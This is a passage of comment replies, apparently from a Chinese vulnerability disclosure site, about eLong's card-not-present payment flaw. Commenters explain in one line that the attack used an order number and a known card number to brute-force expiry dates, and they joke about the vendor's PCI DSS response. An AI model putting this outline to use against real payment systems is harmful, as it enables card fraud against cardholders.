136. 2016-03-25 13:33 | 三分球 ( 路人 | Rank:4 漏洞数:2 | 三分球)

     1

     无卡支付（Card-Not-Present，CNP），国外电商很常见啊。银行对此类支付纪录一般都会有比较详细的记录，事后查，厂商应该也有记录吧？？敢订不敢住啊...

     136# 回复此人

137. 2016-03-26 13:30 | GANDALF THE WHITE ( 实习白帽子 | Rank:70 漏洞数:21 | 但我相信，能战胜未知困难的，不是止步不前...)

     2

     各位大神都看懂了，就我没懂，我理一下思路，大家如果想帮助小弟提升一下的，请回复我一下，非常感谢！首先，银行卡+有效期，然后洞主那边用订单号和有效期作为爆破点去爆破有效期，这两个点之间我就不明白了，因为比如，我订了一套总统炮房，OK，到了支付环节，我是不是要爆破银行卡和对应的有效期，对吧，两个交叉组合成功的，成功支付，扣你的钱，让我享受开炮的乐趣。跟订单号有啥关系？？？

     137# 回复此人

138. 2016-03-26 20:25 | 爱捣蛋的鬼 ( 实习白帽子 | Rank:77 漏洞数:15 | 爱捣蛋的鬼)

     1

     @GANDALF THE WHITE 用这个订单号 + 已知的银行卡 + 爆破有效期(主要爆破这个), 订单号只是前置条件

     138# 回复此人

139. 2016-03-26 20:26 | 爱捣蛋的鬼 ( 实习白帽子 | Rank:77 漏洞数:15 | 爱捣蛋的鬼)

     1

     艺龙你让别人能爆破就是你的问题，别扯别的

     139# 回复此人

140. 2016-03-27 09:58 | 酷帥王子 ( 普通白帽子 | Rank:270 漏洞数:74 | 天之屌，人之神！天人合一，乃屌神也！绝对...)

     1

     作为已经在本行业经营十多年的成熟企业，艺龙提醒广大用户妥善保管好自己的信用卡信息。艺龙已经通过了PCI DSS认证（Payment Card Industry Data Security Standard，由国际顶级信用卡公司Visa，MasterCard，JCB等联合出台的全球信用卡信息安全标准），将与银行和同业公司一起努力为广大用户提供更安全，更方便和更快捷的支付体验

     140# 回复此人

141. 2016-03-27 10:34 | GANDALF THE WHITE ( 实习白帽子 | Rank:70 漏洞数:21 | 但我相信，能战胜未知困难的，不是止步不前...)

     1

     @爱捣蛋的鬼 O(∩_∩)O谢谢！

     141# 回复此人

142. 2016-03-29 22:13 | 屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)

     2

     我收到我的银行卡消费信息，吓到我赶紧骑单车去银行查。结果...发现我卡里的5毛钱还在，真是吓死人了！额，我车呢。。。呀，卡忘了。。

     142# 回复此人

143. 2016-03-30 00:25 | 雅柏菲卡 ( 普通白帽子 | Rank:1299 漏洞数:259 | 雙魚座聖鬥士雅柏菲卡)

     1

     @盛大在线 唉……

     143# 回复此人

144. 2016-04-06 12:56 | 柯腾 ( 普通白帽子 | Rank:111 漏洞数:29 )

     1

     不需要CVV？

     144# 回复此人

145. 2016-04-06 13:10 | 骑虎打狗 ( 路人 | Rank:19 漏洞数:9 | 我是中国式的 你懂得..)

     1

     艺龙你让别人能爆破就是你的问题，别扯别的

     145# 回复此人